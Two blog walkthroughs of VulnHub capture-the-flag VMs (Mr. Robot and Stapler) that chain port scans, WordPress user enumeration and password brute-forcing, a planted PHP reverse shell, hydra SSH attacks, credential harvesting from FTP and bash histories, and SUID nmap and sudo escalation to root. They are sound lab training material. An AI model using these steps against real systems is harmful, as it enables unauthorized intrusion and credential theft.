Tuesday, July 5, 2016

fsociety - Mr. R0b0t

Mr. Robot vulnerable VM by jason

"Based on the show, Mr. Robot.
This VM has three keys hidden in different locations. Your goal is to find all three. Each key is progressively difficult to find.
The VM isn't too difficult. There isn't any advanced exploitation or reverse engineering. The level is considered beginner-intermediate."

Lets Reap Some Bytes

Command:  netdiscover -r 10.10.10.0/24

Command: nmap -sS -Pn -p1-65535 10.10.10.4

Sweet. Nothing but http/https running. 

Command:  nikto -host 10.10.10.4
Nice, word-press. 
This should definitely help us get a rev shell.


Command: wpscan --url http://10.10.10.4

WPScan has revealed much of the same normal stuff. Although nikto did not tell us that a robots.txt was present so i will WGet the robots.txt file and see if there are any other clues to be found.
Command:  wget http://10.10.10.4/robots.txt
Command: cat robots.txt
So robots.txt reveals our first key and a fsocity.dic file. We use wget to retrieve both.

First Key: 073403c8a58a1f80d943455fb30724b9

User Enumeration: 
So i decided to reinvent the wheel and create my own WordPress user enum tool. (WPScan can do this but i wanted to work in some python of my own, for learnings sake).

My Code
****NOTE: I opted not to use threading due to the small amount of enumberation that needs to occur. I would add multithreading if i was to use very large username lists ****


Command: python MrRobot_WPUsername_Enum.py /usr/share/wordlists/ByteReaper_Lists/Given-Names http://10.10.10.4/wp-login.php


Found User: elliot  (the name list i used is from outpost9)

Using the username elliot we should be able to bruteforce a password. I decided that the fsocity.dic file would be a good dictionary to use as it was given to us by the author :)
Command: wpscan --url http://10.10.10.4 --wordlist ~/Documents/MrRobot/fsocity.dic --threads 50 --username elliot

Awesome we have a hit...after 4 hours...because the password was the 2nd to last word in the list....thanks for that...

Upon logging in as elliot i was able to modify the php of the site to add a reverse shell.
Command: nc -lvp 80
Sweet we have a rev shell. Now lets power it up.
Command: python -c "import pty;pty.spawn('/bin/bash');"
Looking at the home folder we can see that robot is readable.
Command: ls -lah

Sweet the 2nd flag (we cannot read it currently, and admittedly i forgot to go back for it).
Command: cat password.raw-md5

Dropping the hash into the google resulted in "abcdefghijklmnopqrstuvwxyz". lul.


Command: su robot

(again i forgot to cat the 2-of-3-flag.txt file)...

I did a good amount of looking around for sudo -l, crons, etc. i found nothing much with any of them. But what i did find was a suid bit for nmap. Awesome nmap has an interactive mode. Lets see if we can get anything with it.
Command: nmap --interactive

Sweet. We got r00t. and our third flag.

w00t w00t. flag 3 ==>  04787ddef27c3dee1ee161b21670b4e4


Sorry for the abbreviated ending to this tutorial. I was trying to finish asap before the long weekend.

Thanks again to vulnhub for hosting this awesomeness.

Monday, June 27, 2016

Execuse me...I believe you have my stapler

Stapler

He110 w0rld! Today i will be sharing a guide to completing the Stapler VM hosted on VulnHub. This VM was created by the one and only @g0tmi1k. 

As always there will be spoilers within this guide so use as little or as much as you need.

***With all these VMs there are always multiple ways to r00t the box***



+---------------------------------------------------------+
|                                                         |
|                                  __..--''\              |
|                          __..--''         \             |
|                  __..--''          __..--''             |
|          __..--''          __..--''       |             |
|          \ o        __..--''____....----""              |
|           \__..--''\                                    |
|           |         \                                   |
|          +----------------------------------+           |
|          +----------------------------------+           |
|                                                         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|   Name: Stapler           |          IP: DHCP           |
|   Date: 2016-June-08      |        Goal: Get Root!      |
| Author: g0tmi1k           | Difficultly: ??? ;)         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|                                                         |
| + Average beginner/intermediate VM, only a few twists   |
|   + May find it easy/hard (depends on YOUR background)  |
|   + ...also which way you attack the box                |
|                                                         |
| + It SHOULD work on both VMware and Virtualbox          |
|   + REBOOT the VM if you CHANGE network modes           |
|   + Fusion users, you'll need to retry when importing   |
|                                                         |
| + There are multiple methods to-do this machine         |
|   + At least two (2) paths to get a limited shell       |
|   + At least three (3) ways to get a root access        |
|                                                         |
| + Made for BsidesLondon 2016                            |
|   + Slides: https://download.vulnhub.com/media/stapler/ |
|                                                         |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman  |
|   + ...and shout-outs to the VulnHub-CTF Team =)        |
|                                                         |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
|                                                         |
|       --[[~~Enjoy. Have fun. Happy Hacking.~~]]--       |
|                                                         |
+---------------------------------------------------------+
 
Lets reap some bytes...

Discovery

Command: netdiscover -r 192.168.153.0/24
***Please note your IP Range can/will differ***
0Currently scanning: 192.168.153.0/24 | Screen View: Unique Hosts
13 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
2_____________________________________________________________________________
3IP At MAC Address Count Len MAC Vendor / Hostname
4-----------------------------------------------------------------------------
5192.168.153.1 00:50:56:c0:00:01 1 60 VMware, Inc.
6192.168.153.142 00:0c:29:8b:3c:14 1 60 VMware, Inc.
7192.168.153.254 00:50:56:f8:e3:7b 1 60 VMware, Inc.

Enumeration

Command: nmap -sS -Pn -p1-65535 192.168.153.142
0root@lulb0x:~# nmap -sS -Pn -p1-65535 192.168.153.142
1Starting Nmap 7.12 ( https://nmap.org ) at 2016-06-24 15:26 EDT
2Nmap scan report for Red.Initech (192.168.153.142)
3Host is up (0.00023s latency).
4Not shown: 65523 filtered ports
5PORT STATE SERVICE
620/tcp closed ftp-data
721/tcp open ftp
822/tcp open ssh
953/tcp open domain
1080/tcp open http
11123/tcp closed ntp
12137/tcp closed netbios-ns
13138/tcp closed netbios-dgm
14139/tcp open netbios-ssn
15666/tcp open doom
163306/tcp open mysql
1712380/tcp open unknown
18MAC Address: 00:0C:29:8B:3C:14 (VMware)
Lots of fun stuff to play with. 

Service Exploration

FTP


0root@lulb0x:~# ftp 192.168.153.142
1Connected to 192.168.153.142.
2220-
3220-|-----------------------------------------------------------------------------------------|
4220-| Harry, make sure to update the banner when you get a chance to show who has access here |
5220-|-----------------------------------------------------------------------------------------|
6220-
7220
8Name (192.168.153.142:root): Anonymous
9331 Please specify the password.
10Password:
11230 Login successful.
12Remote system type is UNIX.
13Using binary mode to transfer files.
14ftp> ls
15200 PORT command successful. Consider using PASV.
16150 Here comes the directory listing.
17-rw-r--r-- 1 0 0 107 Jun 03 23:06 note
18226 Directory send OK.
19ftp> get note
20local: note remote: note
21200 PORT command successful. Consider using PASV.
22150 Opening BINARY mode data connection for note (107 bytes).
23226 Transfer complete.
24107 bytes received in 0.00 secs (50.0442 kB/s)
25ftp> exit

Interesting a potential user Harry i will add this to the list of potential users. Reading our loot (note) reveals...
0root@lulb0x:~# cat note
1Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John. 
Once again more potential users elly and john. With nothing more to see / do in the FTP realm at this time we move on.

SSH

Usually there is nothing to gain from trying to SSH at this point but i always connect just to see if the banner (assuming there is one) has any hints that we can put away for a later time.
 
0root@lulb0x:~# ssh 192.168.153.142
1-----------------------------------------------------------------
2~ Barry, don't forget to put a message here ~
3-----------------------------------------------------------------
4root@192.168.153.142's password:
Sweet, another potential user barry... at this point we can try to brute force the ssh service but i will hold off abit longer just in case. No need to make more noise at this point.

666 - The port of the beast!!!

0root@lulb0x:~# nc 192.168.153.142 666
1PK d��Hp� ��, 2
2message2.jpgUT +�QWJ�QWux
3� �z
4T ���P���A@� �UT�T � 2>��RDK �Jj�"DL[E�
50<Ĵ�ʮn���V �W�H �
Brutal... Looks like someone wants me to have a file of some sort.
Command: nc 192.168.153.142 666 > SatanicFile
0root@lulb0x:~/Documents/Stapler/Satans_Port# file Satanic_File
1Satanic_File: Zip archive data, at least v2.0 to extract
So our Satanic_File seems to be a Zip file.
Command: Unzip Satanic_File
0root@lulb0x:~/Documents/Stapler/Satans_Port# unzip Satanic_File.zip
1Archive: Satanic_File.zip
2inflating: message2.jpg
So the unzip reveals a JPG that has a message that displays.
Great yet another potential user: scott
Now, i have been burned a couple times in these VMs by not checking out the jpgs for hidden messages. So i always run strings on the images.
Command: strings message2.jpg
0JFIF
1vPhotoshop 3.0
28BIM
31If you are reading this, you should get a cookie!
If you are reading this you should get a cookie.....no thanks, i dont eat cookies, i steal them :) Seems that there is nothing else to to with Satans Port. So we move along.

Port 12380

Trying to figure out what port 12380 contains with netcat was pretty simple.
Interesting a webpage with 3 more peoples names:
dave
tim
zoe

Port 80 /12380 : Http(s?)

Since we know that 12380 turned out to be a website we can now run nikto and dirb/dirbuster against them.
Command: nikto -host 192.168.153.142; dirb http://192.168.153.142
0root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142; dirb http://192.168.153.142
1- Nikto v2.1.6
2---------------------------------------------------------------------------
3+ Target IP: 192.168.153.142
4+ Target Hostname: 192.168.153.142
5+ Target Port: 80
6+ Start Time: 2016-06-27 10:56:46 (GMT-4)
7---------------------------------------------------------------------------
8+ Server: No banner retrieved
9+ The anti-clickjacking X-Frame-Options header is not present.
10+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
11+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
12+ No CGI Directories found (use '-C all' to force check all possible dirs)
13+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
14+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
15+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
16+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
17+ End Time: 2016-06-27 10:56:58 (GMT-4) (12 seconds)
18---------------------------------------------------------------------------
19+ 1 host(s) tested
20-----------------
21DIRB v2.22
22By The Dark Raver
23-----------------
24START_TIME: Mon Jun 27 10:56:58 2016
25URL_BASE: http://192.168.153.142/
26WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
27-----------------
28GENERATED WORDS: 4612
29---- Scanning URL: http://192.168.153.142/ ----
30+ http://192.168.153.142/.bashrc (CODE:200|SIZE:3771)
31+ http://192.168.153.142/.profile (CODE:200|SIZE:675)
32-----------------
33END_TIME: Mon Jun 27 10:57:02 2016
34DOWNLOADED: 4612 - FOUND: 2
We can see that it initially finds 2 files: .bashrc and .profile.
Looking quickly i didn't find anything of earth-shattering awesome sauce so i moved on to 12380 Command: nikto -host 192.168.153.142 -port 12380;
0root@lulb0x:~/Documents/Stapler# nikto -host 192.168.153.142 -port 12380;
1- Nikto v2.1.6
2---------------------------------------------------------------------------
3+ Target IP: 192.168.153.142
4+ Target Hostname: 192.168.153.142
5+ Target Port: 12380
6---------------------------------------------------------------------------
7+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?
/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
8Ciphers: ECDHE-RSA-AES256-GCM-SHA384
9Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?
/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
10+ Start Time: 2016-06-27 11:01:00 (GMT-4)
11---------------------------------------------------------------------------
12+ Server: Apache/2.4.18 (Ubuntu)
13+ Server leaks inodes via ETags, header found with file /, fields: 0x15 0x5347c53a972d1
14+ The anti-clickjacking X-Frame-Options header is not present.
15+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
16+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
17+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
18+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
19+ No CGI Directories found (use '-C all' to force check all possible dirs)
20+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
21+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
22+ "robots.txt" contains 2 entries which should be manually viewed.
23+ Hostname '192.168.153.142' does not match certificate's names: Red.Initech
24+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
25+ Uncommon header 'x-ob_mode' found, with contents: 1
26+ OSVDB-3233: /icons/README: Apache default file found.
27+ /phpmyadmin/: phpMyAdmin directory found
28+ 7690 requests: 0 error(s) and 14 item(s) reported on remote host
29+ End Time: 2016-06-27 11:02:40 (GMT-4) (100 seconds)

So we are getting a ssl cert and we get another user: pam.
Also, we get 2 folders from the robots.txt file:
admin112233
blogblog (potentially a cms) nice.
Navigating to https://192.168.153.142:12380/admin112233 gives us the following (did you get caught :)  )

Moving on...

blogblog reveals itself as a WordPress site. Sweet. If we get a credential, hopefully we can edit a theme and drop a rev shell or RCE.

For this next part i am going to use wpscan to find everything of value (If you are looking for another awesome tutorial, a video one, check out https://7ms.us Brian does a great job of explaining what flags to use for wpscan. Thanks Brian @7minsec)

Command: wpscan --url https://192.168.153.142:12380/blogblog/ -e u[1-20] -e a
0_______________________________________________________________
1__ _______ _____
2\ \ / / __ \ / ____|
3\ \ /\ / /| |__) | (___ ___ __ _ _ __
4\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
5\ /\ / | | ____) | (__| (_| | | | |
6\/ \/ |_| |_____/ \___|\__,_|_| |_|
7WordPress Security Scanner by the WPScan Team
8Version 2.9.1
9Sponsored by Sucuri - https://sucuri.net
10@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
11_______________________________________________________________
12[+] URL: https://192.168.153.142:12380/blogblog/
13[+] Started: Mon Jun 27 11:17:31 2016
14[!] The WordPress 'https://192.168.153.142:12380/blogblog/readme.html' file exists exposing a version number
15[+] Interesting header: DAVE: Soemthing doesn't look right here
16[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
17[!] Registration is enabled: https://192.168.153.142:12380/blogblog/wp-login.php?action=register
18[+] XML-RPC Interface available under: https://192.168.153.142:12380/blogblog/xmlrpc.php
19[!] Upload directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-content/uploads/
20[!] Includes directory has directory listing enabled: https://192.168.153.142:12380/blogblog/wp-includes/
21[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
22[!] 21 vulnerabilities identified from the version number
So we know that it is running version 4.2.1 with 21 vulnerabilities...nice... But i want to see what (if any) users could be found.
0[+] Enumerating usernames ...
1[+] Identified the following 16 user/s:
2+----+---------+-----------------+
3| Id | Login | Name |
4+----+---------+-----------------+
5| 1 | john | John Smith |
6| 2 | elly | Elly Jones |
7| 3 | peter | Peter Parker |
8| 4 | barry | Barry Atkins |
9| 5 | heather | Heather Neville |
10| 6 | garry | garry |
11| 7 | harry | harry |
12| 8 | scott | scott |
13| 9 | kathy | kathy |
14| 10 | tim | tim |
15| 11 | zoe | ZOE |
16| 12 | dave | Dave |
17| 13 | simon | Simon |
18| 14 | abby | Abby |
19| 15 | vicki | Vicki |
20| 16 | pam | Pam |
21+----+---------+-----------------+
Damn.... Thats alot of users, some of which look pretty familiar:
pam
dave
zoe
tim
garry
harry
barry
peter
john
elly

I remember seeing a message for elly stating that there was a payload waiting for her in her ftp account... or something like that. lets see if wpscan can brute her password.
Command: wpscan --url https://192.168.153.142:12380/blogblog/ --wordlist /usr/share/wordlists/rockyou_5max.txt --username elly

****NOTE: rockyou_5max.txt is just the rockyou list but only the words that are 5 chars or less****
****NOTE v2.0: I created a bruteforcer in python for finding the password also, as a codemonkey i feel the need to always try on my own. If anyone wants it feel free to leave a comment and i can share with you****
0[+] Enumerating plugins from passive detection ...
1[+] No plugins found
2[+] Starting the password brute forcer
3[+] [SUCCESS] Login : elly Password : ylle
4Brute Forcing 'elly' Time: 00:18:01
5+----+-------+------+----------+
6| Id | Login | Name | Password |
7+----+-------+------+----------+
8| | elly | | ylle |
9+----+-------+------+----------+
10[+] Finished: Mon Jun 27 11:46:55 2016
11[+] Requests Done: 99717
12[+] Memory used: 42.395 MB
13[+] Elapsed time: 00:18:04

Ooh... elly was cracked with the password of ylle.
Lets switch back and try her credentials on the ftp service and see if we get lucky with some password reuse.
0root@lulb0x:~/Documents/Stapler# ftp 192.168.153.142
1Connected to 192.168.153.142.
2220-
3220-|-----------------------------------------------------------------------------------------|
4220-| Harry, make sure to update the banner when you get a chance to show who has access here |
5220-|-----------------------------------------------------------------------------------------|
6220-
7220
8Name (192.168.153.142:root): elly
9331 Please specify the password.
10Password:
11230 Login successful.
12Remote system type is UNIX.
13Using binary mode to transfer files.

Bingo... but what can we see
Command: ls
0ftp> ls
1200 PORT command successful. Consider using PASV.
2150 Here comes the directory listing.
3drwxr-xr-x 5 0 0 4096 Jun 03 13:51 X11
4drwxr-xr-x 3 0 0 4096 Jun 03 13:51 acpi
5-rw-r--r-- 1 0 0 3028 Apr 20 23:09 adduser.conf
6-rw-r--r-- 1 0 0 51 Jun 03 19:20 aliases
7-rw-r--r-- 1 0 0 12288 Jun 03 19:20 aliases.db
8drwxr-xr-x 2 0 0 4096 Jun 07 01:57 alternatives
9drwxr-xr-x 8 0 0 4096 Jun 03 17:46 apache2
10drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apparmor
11drwxr-xr-x 9 0 0 4096 Jun 06 23:17 apparmor.d
12drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apport
13drwxr-xr-x 6 0 0 4096 Jun 03 14:05 apt
14-rw-r----- 1 0 1 144 Jan 14 23:35 at.deny
15drwxr-xr-x 5 0 0 4096 Jun 03 14:47 authbind
16-rw-r--r-- 1 0 0 2188 Sep 01 2015 bash.bashrc
17drwxr-xr-x 2 0 0 4096 Jun 03 13:52 bash_completion.d
18-rw-r--r-- 1 0 0 367 Jan 27 15:17 bindresvport.blacklist
19drwxr-xr-x 2 0 0 4096 Apr 12 11:30 binfmt.d
20drwxr-xr-x 2 0 0 4096 Jun 03 13:51 byobu
21drwxr-xr-x 3 0 0 4096 Jun 03 13:51 ca-certificates
22-rw-r--r-- 1 0 0 7788 Jun 03 13:51 ca-certificates.conf
23drwxr-xr-x 2 0 0 4096 Jun 03 13:49 console-setup
24drwxr-xr-x 2 0 0 4096 Jun 03 19:13 cron.d
25drwxr-xr-x 2 0 0 4096 Jun 03 17:07 cron.daily
26drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.hourly
27drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.monthly
28drwxr-xr-x 2 0 0 4096 Jun 03 13:51 cron.weekly
29-rw-r--r-- 1 0 0 722 Apr 05 22:59 crontab
30-rw-r--r-- 1 0 0 54 Jun 03 13:51 crypttab
31drwxr-xr-x 2 0 0 4096 Jun 04 00:02 dbconfig-common
32drwxr-xr-x 4 0 0 4096 Jun 03 13:51 dbus-1
33-rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf
34-rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version
35drwxr-xr-x 3 0 0 4096 Jun 05 23:04 default
36-rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf
37drwxr-xr-x 2 0 0 4096 Jun 03 13:49 depmod.d
38drwxr-xr-x 4 0 0 4096 Jun 03 13:49 dhcp
39-rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf
40drwxr-xr-x 2 0 0 4096 Jun 03 14:19 dnsmasq.d
41drwxr-xr-x 4 0 0 4096 Jun 07 01:57 dpkg
42-rw-r--r-- 1 0 0 96 Apr 20 23:09 environment
43drwxr-xr-x 4 0 0 4096 Jun 03 14:18 fonts
44-rw-r--r-- 1 0 0 594 Jun 03 13:49 fstab

/etc  = lulz lets grab the passwd file and see if any of our potential users are actual users
Command: get passwd
0ftp> get passwd
1local: passwd remote: passwd
2200 PORT command successful. Consider using PASV.
3150 Opening BINARY mode data connection for passwd (2908 bytes).
4226 Transfer complete.
52908 bytes received in 0.00 secs (6.6826 MB/s)
Command: cat passwd | grep bash | cut -d':' -f1
0RNunemaker
1ETollefson
2DSwanger
3AParnell
4SHayslett
5MBassin
6JBare
7LSolum
8MFrei
9SStroud
10JKanode
11CJoo
12Drew
13jess
14SHAY
15mel
16zoe
17NATHAN
18elly

Okay time to let hydra do what it does best. Command: hydra -L Actual_Users -P /usr/share/john/password.lst ssh://192.168.153.142 -t 15 -u
0root@lulb0x:~/Documents/Stapler# hydra -L Actual_Users -P /usr/share/wordlists/rockyou.txt ssh://192.168.153.142 -t 15 -u
1Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
2Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-27 13:19:14
3[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
4[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
5[DATA] max 15 tasks per 1 server, overall 64 tasks, 272543581 login tries (l:19/p:14344399), ~283899 tries per task
6[DATA] attacking service ssh on port 22
7[STATUS] 162.00 tries/min, 162 tries in 00:01h, 272543419 todo in 28039:27h, 15 active
8[22][ssh] host: 192.168.153.142 login: Drew password: qwerty
9[STATUS] 203.67 tries/min, 611 tries in 00:03h, 272542970 todo in 22303:02h, 15 active
10[22][ssh] host: 192.168.153.142 login: JBare password: cookie
Using the credentials JBare:cookie
Trying to cut some corners, since it seems that all the home folders are public readable....
Command: cat */.bash_history
0JBare@red:/home$ cat */.bash_history
1exit
2free
3exit
4exit
5exit
6exit
7exit
8exit
9exit
10exit
11top
12ps aux
13exit
14exit
15exit
16id
17whoami
18ls -lah
19pwd
20ps aux
21sshpass -p thisimypassword ssh JKanode@localhost
22apt-get install sshpass
23sshpass -p JZQuyIN5 peter@localhost
24ps -ef
25top
26kill -9 3747
27exit
28exit
29exit
30exit
31exit
32whoami
33exit
34exit
35exit
36exit
37exit
38cat: peter/.bash_history: Permission denied
39exit
40exit
41exit
42exit
43exit
44exit
45id
46top
47exit
Nice... 2 more sets of credentials

JKanode:thisismypassword
peter:JZQuyIN5

I am going to try peters credentials first because he has a stronger password...i would like to believe he is a sudoer at a minimum.

Jackpot...peter has full root access with a sudo su we get root and claim our flag

I would like to thank G0tMi1k and Vulnhub and all the testers. This was a very fun VM.